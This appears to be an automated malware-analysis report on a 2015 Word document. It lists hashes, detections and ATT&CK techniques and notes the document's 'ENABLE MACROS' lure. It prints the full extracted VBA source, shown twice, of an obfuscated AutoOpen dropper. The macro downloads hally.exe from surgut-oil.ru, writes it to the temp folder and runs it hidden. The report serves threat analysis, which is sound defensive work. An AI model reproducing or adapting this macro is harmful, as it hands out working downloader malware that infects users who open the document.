Office (OLE) malware analysis — malicious · ad3279479d4d71bb

MALICIOUS

Office (OLE)

52.0 KB Created: 2015-07-03 22:20:00 Authoring application: Microsoft Office Word First seen: 2015-09-14

MD5: 94c2459aa2440f2143fd79a74016d629 SHA-1: efa09b39dbbeb624c161d50b281f8cfa93e39a12 SHA-256: ad3279479d4d71bb11f7053715bb6a90e0903b511dd05a86ccdd4dc7c9fe59b1

310 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter T1140 Deobfuscate/Decode Files or Information

The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro, triggered upon opening, uses 'WScript.Shell' and 'CreateObject' to likely download and execute a second-stage payload from the URL 'http://surgut-oil.ru/general/hally.exe'. The document body explicitly instructs the user to 'ENABLE MACROS', indicating a social engineering lure to bypass security measures.

Heuristics 10

ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
CreateObject("WScript.Shell").Run (ce359afb8d5615d34553f2575844de80), 0, True
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

ce2796d03fc5bb94655c5e9467628721 = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://surgut-oil.ru/general/hally.exe In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- https://www.google.com/images/srpr/logo1w.pngIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10175 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10175 bytes
SHA-256: `3d0dd126ce1f4b45c514ccac6d67bfe70e1497149d7a0c31a90ede355195e123`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim ed6ec970f7eaa11d956da59b8f208b09, ab60888ce3cf07bf971294eb0017f31e, ce359afb8d5615d34553f2575844de80 Dim c66ca3f99e57c970a60975d1d5600bc5, beaf92e375bfe5778fa0d1fc4e1dd473, a14fb443b6f04f2a27a84599dfa87763 Dim ed8524e68f8b931e61a60c717e74f6ee, ce2796d03fc5bb94655c5e9467628721, f22a3bf293afba2159c18e9ee0ae2c8d Dim abac7dd6a1b97d5a437081266bae2272, e5088866c0feaa560cf505b87e2eb67b, c2e092c85daf48b8ec89a17527e5dd4b Dim f7eb61a29a5d75f66ecba4be1fafe180, b36701f7311e7c5027f995fb012fc776, a912e784362afee9ec4f89cb9701406a Dim ce104bc217f117fb348f38c1e0b22ec7, a31c4705ba4216fda913db05409af2be, c6c194089780ab10371201b31b1196cb Dim d5a6022e97e414576d538de41bec2e8e, ac48e9a8f8306da469ee13f5c4a3ae5f, d9772d2442837f9b88f601b8b6065ba4 Dim f99b5f7bdc88f155e93c6e2b4641f39e, b9b6450317544bebe90a236374fbd99a, f4a7353adc9d2ddaf74c1b8edd61c2ab Dim b091bf765e8d5053db42fc1682d72bbd, f795193595febe256f24b80bbc8185eb, a06e1be303deef5b6efb8f03bfb937b7 Dim aba196fcb8ba96030c5a9e5fcd7f4280, d2484fa4a9761e8ebf9dcdac72cf51b5, f339b79ad13d0ba88bbbf63181df38d8 Dim faf103fa5ac95904cfd2caf973d47404, e15eb347a1b6ff6cf3699f29a5b067a3, f653ff76bd02a18be136c5c8d76185cb Dim edf4747994e471ebe5186247938c7899, e7aa9b61a480a93d07369734fc7782ed, a5faf0421edaedabb50af61309bf3a50 Dim b114c8a23f5df776777d9648aed8f991, ba79ab39178f76a4fa88a7b71f36fac4, d69225c9d44d966a6b64159c37cb00f4 Dim bc798b1913e5da6aa35dbc9ed5de99ec, b03c3a03a9a04250feb76a8b13865dbe, db1a7d643ae0c04e81d7df83b2aefa30 Dim ea46283cd4b19effbfb8403e804accaf, ef76e9128ba0cf9909b1f63ea3850d74, e8d56032105d2c3df35ee8de7be4e089 ''''''''''''''''''''''''''''''''''''''' beaf92e375bfe5778fa0d1fc4e1dd473 = "http://surgut-oil.ru/general/hally.exe" ce2796d03fc5bb94655c5e9467628721 = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) ''''''''''''''''''''''''''''''''''''''' f4a7353adc9d2ddaf74c1b8edd61c2ab = "NjcmlwdC5TaGVsbCJeKSAmIGVjaG8gSWYg": e15eb347a1b6ff6cf3699f29a5b067a3 = "pICYgZWNobyBTZXQgYyA9IE5vdGh" a5faf0421edaedabb50af61309bf3a50 = 1445614 + 123 f653ff76bd02a18be136c5c8d76185cb = "pbmcgJiBlY2hvIFNldCBkID0gTm90aGluZyAmIGVjaG8gU2V0IGUgPSBOb3Roa" e8d56032105d2c3df35ee8de7be4e089 = 87898788 + e8d56032105d2c3df35ee8de7be4e089: ac48e9a8f8306da469ee13f5c4a3ae5f = "dGVPYmplY3ReKCJNU1hNTDIuWE1MSFRUUCJeKSAmIGVjaG8gU2V0IGQgPSBDcmVhd" d9772d2442837f9b88f601b8b6065ba4 = "GVPYmplY3ReKCJTY3JpcHRpbmcuRml": e8d56032105d2c3df35ee8de7be4e089 = "asdsadasdsadasdASdsad" d69225c9d44d966a6b64159c37cb00f4 = 45654532 f795193595febe256f24b80bbc8185eb = "BjLlN0YXR1cyA9IDIwMCBUaGVuICYgZWNoby": faf103fa5ac95904cfd2caf973d47404 = "gSWYgJiBlY2hvIGQuRGVsZXRlRmlsZV4oV1NjcmlwdC5TY3JpcHRGdWxsTmFtZV4" ef76e9128ba0cf9909b1f63ea3850d74 = "hiXikgVGhlbiAmIGVjaG8gZi5SdW5eKGJeKSAmIGVjaG8gRW5kIElmICYgZWNobyBFbmQ" ea46283cd4b19effbfb8403e804accaf = "ZC5GaWxlRXhpc3RzXihiXikgVGhlbiBkLkRlbGV0ZUZpbGVeKGJeKSAmIGVjaG8": b114c8a23f5df776777d9648aed8f991 = a5faf0421edaedabb50af61309bf3a50 + 111 b091bf765e8d5053db42fc1682d72bbd = "gYy5vcGVuICJHRVQiLCBhLCBGYWxzZSAmIGVjaG8gYy5zZW5kICYgZWNobyBJZi" ba79ab39178f76a4fa88a7b71f36fac4 = 456666: f99b5f7bdc88f155e93c6e2b4641f39e = "sZVN5c3RlbU9iamVjdCJeKSAmIGVjaG8gU2V0IGUgPSBDcmVhdGVPYmplY3ReKCJ" d69225c9d44d966a6b64159c37cb00f4 = 787854 a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI" d69225c9d44d966a6b64159c37cb00f4 = a5faf0421edaedabb50af61309bf3a50 + 4566: d5a6022e97e414576d538de41bec2e8e = "Jldl4oYSwgIi8iXikgXisgMSwgTGVuXihhXileKSAmIGVjaG8gU2V0IGMgPSBDcmVh" ba79ab39178f76a4fa88a7b71f36fac4 = 75454 + a5faf0421edaedabb50af61309bf3a50: a31c4705ba4216fda913db05409af2be = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ" c6c194089780ab10371201b31b1196cb = "odHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9zcnByL2xvZ28xdy5wbmciICYgZ" a5faf0421edaedabb50af61309bf3a50 = 6565666: db1a7d643ae0c04e81d7df83b2aefa30 = "WNobyBiID0gTWlkXihhLCBJblN0cl" e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ" b9b6450317544bebe90a236374fbd99a = "BRE9EQi5TdHJlYW0iXikgJiBlY2hvIFNldCBmID0gQ3JlYXRlT2JqZWN0XigiV1": b114c8a23f5df776777d9648aed8f991 = 786455 aba196fcb8ba96030c5a9e5fcd7f4280 = "GVjaG8gLk9wZW4gJiBlY2hvIC5Xcml0ZSBjLnJlc3BvbnNlQm9keSAmIGVjaG8gLlNh" d2484fa4a9761e8ebf9dcdac72cf51b5 = "dmVUb0ZpbGUgYiAmIGVjaG8gLkNsb3NlICYgZWNobyBFbmQgV2l0aCAmIGVjaG8" f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi": edf4747994e471ebe5186247938c7899 = "W5nICYg" e7aa9b61a480a93d07369734fc7782ed = "ZWNobyBTZXQgZiA9IE5vdGhpbmcpID4geC52YnMgJiBzdGFydCB4LnZicw==": a912e784362afee9ec4f89cb9701406a = 3 a14fb443b6f04f2a27a84599dfa87763 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" ed6ec970f7eaa11d956da59b8f208b09 = a31c4705ba4216fda913db05409af2be + c6c194089780ab10371201b31b1196cb + db1a7d643ae0c04e81d7df83b2aefa30 + d5a6022e97e414576d538de41bec2e8e + ac48e9a8f8306da469ee13f5c4a3ae5f + d9772d2442837f9b88f601b8b6065ba4 ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + f99b5f7bdc88f155e93c6e2b4641f39e + b9b6450317544bebe90a236374fbd99a + f4a7353adc9d2ddaf74c1b8edd61c2ab + ea46283cd4b19effbfb8403e804accaf + b091bf765e8d5053db42fc1682d72bbd ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + f795193595febe256f24b80bbc8185eb + a06e1be303deef5b6efb8f03bfb937b7 + aba196fcb8ba96030c5a9e5fcd7f4280 + d2484fa4a9761e8ebf9dcdac72cf51b5 + f339b79ad13d0ba88bbbf63181df38d8 ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + ef76e9128ba0cf9909b1f63ea3850d74 + faf103fa5ac95904cfd2caf973d47404 + e15eb347a1b6ff6cf3699f29a5b067a3 + f653ff76bd02a18be136c5c8d76185cb + edf4747994e471ebe5186247938c7899 ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + e7aa9b61a480a93d07369734fc7782ed ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, vbCrLf, "") a5faf0421edaedabb50af61309bf3a50 = 6565666: ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, vbTab, "") f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi" ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, " ", "") ab60888ce3cf07bf971294eb0017f31e = Len(ed6ec970f7eaa11d956da59b8f208b09): For c66ca3f99e57c970a60975d1d5600bc5 = 1 To ab60888ce3cf07bf971294eb0017f31e Step 4 f22a3bf293afba2159c18e9ee0ae2c8d = 3 e8d56032105d2c3df35ee8de7be4e089 = "GVjaG8gLk9wZW4gJiBlY2hvIC5Xcml0ZSBjLnJlc3BvbnNlQm9keSAmIGVjaG8gLlNh" b36701f7311e7c5027f995fb012fc776 = 0: b03c3a03a9a04250feb76a8b13865dbe = b36701f7311e7c5027f995fb012fc776 a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI": bc798b1913e5da6aa35dbc9ed5de99ec = 6: For abac7dd6a1b97d5a437081266bae2272 = b03c3a03a9a04250feb76a8b13865dbe To a912e784362afee9ec4f89cb9701406a e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ" e5088866c0feaa560cf505b87e2eb67b = Mid(ed6ec970f7eaa11d956da59b8f208b09, c66ca3f99e57c970a60975d1d5600bc5 + abac7dd6a1b97d5a437081266bae2272, 1) ce104bc217f117fb348f38c1e0b22ec7 = 2: b36701f7311e7c5027f995fb012fc776 = ce104bc217f117fb348f38c1e0b22ec7 + 1 ef76e9128ba0cf9909b1f63ea3850d74 = "hiXikgVGhlbiAmIGVjaG8gZi5SdW5eKGJeKSAmIGVjaG8gRW5kIElmICYgZWNobyBFbmQ" e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ" b9b6450317544bebe90a236374fbd99a = "BRE9EQi5TdHJlYW0iXikgJiBlY2hvIFNldCBmID0gQ3JlYXRlT2JqZWN0XigiV1" If e5088866c0feaa560cf505b87e2eb67b = "=" Then f22a3bf293afba2159c18e9ee0ae2c8d = f22a3bf293afba2159c18e9ee0ae2c8d - 1 ba79ab39178f76a4fa88a7b71f36fac4 = "gSWYgJiBlY2hvIGQuRGVsZXRlRmlsZV4oV1NjcmlwdC5TY3JpcHRGdWxsTmFtZV4" c2e092c85daf48b8ec89a17527e5dd4b = b03c3a03a9a04250feb76a8b13865dbe Else c2e092c85daf48b8ec89a17527e5dd4b = InStr(1, a14fb443b6f04f2a27a84599dfa87763, e5088866c0feaa560cf505b87e2eb67b, vbBinaryCompare) - 1: End If b36701f7311e7c5027f995fb012fc776 = ce104bc217f117fb348f38c1e0b22ec7 + ed8524e68f8b931e61a60c717e74f6ee - 1000 * 5 - ed8524e68f8b931e61a60c717e74f6ee b03c3a03a9a04250feb76a8b13865dbe = 64 * b03c3a03a9a04250feb76a8b13865dbe + c2e092c85daf48b8ec89a17527e5dd4b: Next c6c194089780ab10371201b31b1196cb = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI": b03c3a03a9a04250feb76a8b13865dbe = Hex(b03c3a03a9a04250feb76a8b13865dbe) a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI" d69225c9d44d966a6b64159c37cb00f4 = a5faf0421edaedabb50af61309bf3a50 + 4566 d5a6022e97e414576d538de41bec2e8e = "Jldl4oYSwgIi8iXikgXisgMSwgTGVuXihhXileKSAmIGVjaG8gU2V0IGMgPSBDcmVh" ba79ab39178f76a4fa88a7b71f36fac4 = 75454 + a5faf0421edaedabb50af61309bf3a50 b03c3a03a9a04250feb76a8b13865dbe = String(bc798b1913e5da6aa35dbc9ed5de99ec - Len(b03c3a03a9a04250feb76a8b13865dbe), "0") & b03c3a03a9a04250feb76a8b13865dbe f7eb61a29a5d75f66ecba4be1fafe180 = Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 1, 2))) + Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 3, 2))) + Chr(CByte("&H" & Mid(b03c3a03a9a04250feb76a8b13865dbe, 5, 2))) ce359afb8d5615d34553f2575844de80 = ce359afb8d5615d34553f2575844de80 & Left(f7eb61a29a5d75f66ecba4be1fafe180, f22a3bf293afba2159c18e9ee0ae2c8d): Next ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "https://www.google.com/images/srpr/logo1w.png", beaf92e375bfe5778fa0d1fc4e1dd473) f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi" ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "c:\users\public\documents", ce2796d03fc5bb94655c5e9467628721) e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ" ce359afb8d5615d34553f2575844de80 = Replace(ce359afb8d5615d34553f2575844de80, "x.vbv", "x.vbs") CreateObject("WScript.Shell").Run (ce359afb8d5615d34553f2575844de80), 0, True End Sub

SHA-256: 3d0dd126ce1f4b45c514ccac6d67bfe70e1497149d7a0c31a90ede355195e123

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim ed6ec970f7eaa11d956da59b8f208b09, ab60888ce3cf07bf971294eb0017f31e, ce359afb8d5615d34553f2575844de80
Dim c66ca3f99e57c970a60975d1d5600bc5, beaf92e375bfe5778fa0d1fc4e1dd473, a14fb443b6f04f2a27a84599dfa87763
Dim ed8524e68f8b931e61a60c717e74f6ee, ce2796d03fc5bb94655c5e9467628721, f22a3bf293afba2159c18e9ee0ae2c8d
Dim abac7dd6a1b97d5a437081266bae2272, e5088866c0feaa560cf505b87e2eb67b, c2e092c85daf48b8ec89a17527e5dd4b
Dim f7eb61a29a5d75f66ecba4be1fafe180, b36701f7311e7c5027f995fb012fc776, a912e784362afee9ec4f89cb9701406a
Dim ce104bc217f117fb348f38c1e0b22ec7, a31c4705ba4216fda913db05409af2be, c6c194089780ab10371201b31b1196cb
Dim d5a6022e97e414576d538de41bec2e8e, ac48e9a8f8306da469ee13f5c4a3ae5f, d9772d2442837f9b88f601b8b6065ba4
Dim f99b5f7bdc88f155e93c6e2b4641f39e, b9b6450317544bebe90a236374fbd99a, f4a7353adc9d2ddaf74c1b8edd61c2ab
Dim b091bf765e8d5053db42fc1682d72bbd, f795193595febe256f24b80bbc8185eb, a06e1be303deef5b6efb8f03bfb937b7
Dim aba196fcb8ba96030c5a9e5fcd7f4280, d2484fa4a9761e8ebf9dcdac72cf51b5, f339b79ad13d0ba88bbbf63181df38d8
Dim faf103fa5ac95904cfd2caf973d47404, e15eb347a1b6ff6cf3699f29a5b067a3, f653ff76bd02a18be136c5c8d76185cb
Dim edf4747994e471ebe5186247938c7899, e7aa9b61a480a93d07369734fc7782ed, a5faf0421edaedabb50af61309bf3a50
Dim b114c8a23f5df776777d9648aed8f991, ba79ab39178f76a4fa88a7b71f36fac4, d69225c9d44d966a6b64159c37cb00f4
Dim bc798b1913e5da6aa35dbc9ed5de99ec, b03c3a03a9a04250feb76a8b13865dbe, db1a7d643ae0c04e81d7df83b2aefa30
Dim ea46283cd4b19effbfb8403e804accaf, ef76e9128ba0cf9909b1f63ea3850d74, e8d56032105d2c3df35ee8de7be4e089
'''''''''''''''''''''''''''''''''''''''
beaf92e375bfe5778fa0d1fc4e1dd473 = "http://surgut-oil.ru/general/hally.exe"
ce2796d03fc5bb94655c5e9467628721 = CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)
'''''''''''''''''''''''''''''''''''''''
f4a7353adc9d2ddaf74c1b8edd61c2ab = "NjcmlwdC5TaGVsbCJeKSAmIGVjaG8gSWYg": e15eb347a1b6ff6cf3699f29a5b067a3 = "pICYgZWNobyBTZXQgYyA9IE5vdGh"
a5faf0421edaedabb50af61309bf3a50 = 1445614 + 123
f653ff76bd02a18be136c5c8d76185cb = "pbmcgJiBlY2hvIFNldCBkID0gTm90aGluZyAmIGVjaG8gU2V0IGUgPSBOb3Roa"
e8d56032105d2c3df35ee8de7be4e089 = 87898788 + e8d56032105d2c3df35ee8de7be4e089: ac48e9a8f8306da469ee13f5c4a3ae5f = "dGVPYmplY3ReKCJNU1hNTDIuWE1MSFRUUCJeKSAmIGVjaG8gU2V0IGQgPSBDcmVhd"
d9772d2442837f9b88f601b8b6065ba4 = "GVPYmplY3ReKCJTY3JpcHRpbmcuRml": e8d56032105d2c3df35ee8de7be4e089 = "asdsadasdsadasdASdsad"
d69225c9d44d966a6b64159c37cb00f4 = 45654532
f795193595febe256f24b80bbc8185eb = "BjLlN0YXR1cyA9IDIwMCBUaGVuICYgZWNoby": faf103fa5ac95904cfd2caf973d47404 = "gSWYgJiBlY2hvIGQuRGVsZXRlRmlsZV4oV1NjcmlwdC5TY3JpcHRGdWxsTmFtZV4"
ef76e9128ba0cf9909b1f63ea3850d74 = "hiXikgVGhlbiAmIGVjaG8gZi5SdW5eKGJeKSAmIGVjaG8gRW5kIElmICYgZWNobyBFbmQ"
ea46283cd4b19effbfb8403e804accaf = "ZC5GaWxlRXhpc3RzXihiXikgVGhlbiBkLkRlbGV0ZUZpbGVeKGJeKSAmIGVjaG8": b114c8a23f5df776777d9648aed8f991 = a5faf0421edaedabb50af61309bf3a50 + 111
b091bf765e8d5053db42fc1682d72bbd = "gYy5vcGVuICJHRVQiLCBhLCBGYWxzZSAmIGVjaG8gYy5zZW5kICYgZWNobyBJZi"
ba79ab39178f76a4fa88a7b71f36fac4 = 456666: f99b5f7bdc88f155e93c6e2b4641f39e = "sZVN5c3RlbU9iamVjdCJeKSAmIGVjaG8gU2V0IGUgPSBDcmVhdGVPYmplY3ReKCJ"
d69225c9d44d966a6b64159c37cb00f4 = 787854
a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI"
d69225c9d44d966a6b64159c37cb00f4 = a5faf0421edaedabb50af61309bf3a50 + 4566: d5a6022e97e414576d538de41bec2e8e = "Jldl4oYSwgIi8iXikgXisgMSwgTGVuXihhXileKSAmIGVjaG8gU2V0IGMgPSBDcmVh"
ba79ab39178f76a4fa88a7b71f36fac4 = 75454 + a5faf0421edaedabb50af61309bf3a50: a31c4705ba4216fda913db05409af2be = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
c6c194089780ab10371201b31b1196cb = "odHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9zcnByL2xvZ28xdy5wbmciICYgZ"
a5faf0421edaedabb50af61309bf3a50 = 6565666: db1a7d643ae0c04e81d7df83b2aefa30 = "WNobyBiID0gTWlkXihhLCBJblN0cl"
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
b9b6450317544bebe90a236374fbd99a = "BRE9EQi5TdHJlYW0iXikgJiBlY2hvIFNldCBmID0gQ3JlYXRlT2JqZWN0XigiV1": b114c8a23f5df776777d9648aed8f991 = 786455
aba196fcb8ba96030c5a9e5fcd7f4280 = "GVjaG8gLk9wZW4gJiBlY2hvIC5Xcml0ZSBjLnJlc3BvbnNlQm9keSAmIGVjaG8gLlNh"
d2484fa4a9761e8ebf9dcdac72cf51b5 = "dmVUb0ZpbGUgYiAmIGVjaG8gLkNsb3NlICYgZWNobyBFbmQgV2l0aCAmIGVjaG8"
f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi": edf4747994e471ebe5186247938c7899 = "W5nICYg"
e7aa9b61a480a93d07369734fc7782ed = "ZWNobyBTZXQgZiA9IE5vdGhpbmcpID4geC52YnMgJiBzdGFydCB4LnZicw==": a912e784362afee9ec4f89cb9701406a = 3
a14fb443b6f04f2a27a84599dfa87763 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
ed6ec970f7eaa11d956da59b8f208b09 = a31c4705ba4216fda913db05409af2be + c6c194089780ab10371201b31b1196cb + db1a7d643ae0c04e81d7df83b2aefa30 + d5a6022e97e414576d538de41bec2e8e + ac48e9a8f8306da469ee13f5c4a3ae5f + d9772d2442837f9b88f601b8b6065ba4
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + f99b5f7bdc88f155e93c6e2b4641f39e + b9b6450317544bebe90a236374fbd99a + f4a7353adc9d2ddaf74c1b8edd61c2ab + ea46283cd4b19effbfb8403e804accaf + b091bf765e8d5053db42fc1682d72bbd
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + f795193595febe256f24b80bbc8185eb + a06e1be303deef5b6efb8f03bfb937b7 + aba196fcb8ba96030c5a9e5fcd7f4280 + d2484fa4a9761e8ebf9dcdac72cf51b5 + f339b79ad13d0ba88bbbf63181df38d8
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + ef76e9128ba0cf9909b1f63ea3850d74 + faf103fa5ac95904cfd2caf973d47404 + e15eb347a1b6ff6cf3699f29a5b067a3 + f653ff76bd02a18be136c5c8d76185cb + edf4747994e471ebe5186247938c7899
ed6ec970f7eaa11d956da59b8f208b09 = ed6ec970f7eaa11d956da59b8f208b09 + e7aa9b61a480a93d07369734fc7782ed
ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, vbCrLf, "")
a5faf0421edaedabb50af61309bf3a50 = 6565666: ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, vbTab, "")
f339b79ad13d0ba88bbbf63181df38d8 = "gSWYgZC5GaWxlRXhpc3RzXi"
ed6ec970f7eaa11d956da59b8f208b09 = Replace(ed6ec970f7eaa11d956da59b8f208b09, " ", "")
ab60888ce3cf07bf971294eb0017f31e = Len(ed6ec970f7eaa11d956da59b8f208b09): For c66ca3f99e57c970a60975d1d5600bc5 = 1 To ab60888ce3cf07bf971294eb0017f31e Step 4
f22a3bf293afba2159c18e9ee0ae2c8d = 3
e8d56032105d2c3df35ee8de7be4e089 = "GVjaG8gLk9wZW4gJiBlY2hvIC5Xcml0ZSBjLnJlc3BvbnNlQm9keSAmIGVjaG8gLlNh"
b36701f7311e7c5027f995fb012fc776 = 0: b03c3a03a9a04250feb76a8b13865dbe = b36701f7311e7c5027f995fb012fc776
a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI": bc798b1913e5da6aa35dbc9ed5de99ec = 6: For abac7dd6a1b97d5a437081266bae2272 = b03c3a03a9a04250feb76a8b13865dbe To a912e784362afee9ec4f89cb9701406a
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
e5088866c0feaa560cf505b87e2eb67b = Mid(ed6ec970f7eaa11d956da59b8f208b09, c66ca3f99e57c970a60975d1d5600bc5 + abac7dd6a1b97d5a437081266bae2272, 1)
ce104bc217f117fb348f38c1e0b22ec7 = 2: b36701f7311e7c5027f995fb012fc776 = ce104bc217f117fb348f38c1e0b22ec7 + 1
ef76e9128ba0cf9909b1f63ea3850d74 = "hiXikgVGhlbiAmIGVjaG8gZi5SdW5eKGJeKSAmIGVjaG8gRW5kIElmICYgZWNobyBFbmQ"
e8d56032105d2c3df35ee8de7be4e089 = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJ"
b9b6450317544bebe90a236374fbd99a = "BRE9EQi5TdHJlYW0iXikgJiBlY2hvIFNldCBmID0gQ3JlYXRlT2JqZWN0XigiV1"
If e5088866c0feaa560cf505b87e2eb67b = "=" Then
f22a3bf293afba2159c18e9ee0ae2c8d = f22a3bf293afba2159c18e9ee0ae2c8d - 1
ba79ab39178f76a4fa88a7b71f36fac4 = "gSWYgJiBlY2hvIGQuRGVsZXRlRmlsZV4oV1NjcmlwdC5TY3JpcHRGdWxsTmFtZV4"
c2e092c85daf48b8ec89a17527e5dd4b = b03c3a03a9a04250feb76a8b13865dbe
Else
c2e092c85daf48b8ec89a17527e5dd4b = InStr(1, a14fb443b6f04f2a27a84599dfa87763, e5088866c0feaa560cf505b87e2eb67b, vbBinaryCompare) - 1: End If
b36701f7311e7c5027f995fb012fc776 = ce104bc217f117fb348f38c1e0b22ec7 + ed8524e68f8b931e61a60c717e74f6ee - 1000 * 5 - ed8524e68f8b931e61a60c717e74f6ee
b03c3a03a9a04250feb76a8b13865dbe = 64 * b03c3a03a9a04250feb76a8b13865dbe + c2e092c85daf48b8ec89a17527e5dd4b: Next
c6c194089780ab10371201b31b1196cb = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI": b03c3a03a9a04250feb76a8b13865dbe = Hex(b03c3a03a9a04250feb76a8b13865dbe)
a06e1be303deef5b6efb8f03bfb937b7 = "BXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI"
